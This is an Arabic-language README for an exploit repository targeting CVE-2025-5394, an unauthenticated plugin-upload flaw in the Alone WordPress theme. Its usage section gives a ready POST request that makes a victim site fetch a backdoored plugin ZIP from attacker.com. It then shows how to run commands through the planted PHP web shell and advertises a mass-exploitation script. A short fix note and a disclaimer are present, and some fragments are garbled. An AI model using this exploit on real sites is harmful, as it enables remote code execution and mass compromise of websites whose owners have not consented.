
وحده – قالب ووردبريس خيري متعدد الأغراض غير ربحي <= 7.8.3 - نقص التفويض يسمح برفع ملفات عشوائية بدون مصادقة عبر تثبيت الإضافة
🔥 ملخص الثغرة
قالب ووردبريس Alone بالإصدارات <= 7.8.3 يعاني من ثغرة رفع ملف عشوائي غير مصادق عليه. هذه الثغرة تسمح لـ المهاجمين غير المصادق عليهم برفع وتثبيت ملفات ZIP للإضافات عشوائية من عناوين URL بعيدة عبر نقطة نهاية AJAX غير محمية — مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE) عن طريق نشر إضافات مخترقة.
تنجم هذه الثغرة عن الوظيفة beplus_import_pack_install_plugin المكشوفة للجمهور عبر wp_ajax_nopriv_ دون أي تحقق من المصادقة أو الصلاحيات. تقوم الوظيفة بتثبيت وتفعيل إضافة من عنوان URL يوفره المستخدم.
🔍 القالب المتأثر
🧪 ميزات الاستغلال
/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin🧠 الباحث
🚀 الاستخدام
قم بتجهيز ملف ZIP ضار للإضافة مستضاف على خادم تتحكم فيه.
Plugin Name:) وباب خلفي PHP (مثل bk.php)قم بتشكيل طلب POST التالي:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&
data[plugin_slug]=hello-dolly&
data[plugin_source]=https://attacker.com/hello-dolly.zip
إذا نجحت العملية، سيتم تثبيت وتفعيل الإضافة. قم بالوصول إلى shell الخاص بك على:
https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
🧰 نص الاستغلال الجماعي يحتوي هذا المستودع على أداة استغلال جماعي مع:
result.txtراجع mass_beplus_exploit.py للتفاصيل.
🛠 توصيات الإصلاح
wp_ajax_nopriv_beplus_import_pack_install_plugin.current_user_can('install_plugins'))🔒 إخلاء المسؤولية:
يتم تقديم هذه المعلومات لأغراض تعليمية واختبار أمني مصرح به فقط. الوصول غير المصرح به أو استخدام أنظمة الكمبيوتر غير قانوني وغير أخلاقي.
📚 المرجع:
CVE: CVE-2025-5394
الباحث: Thai An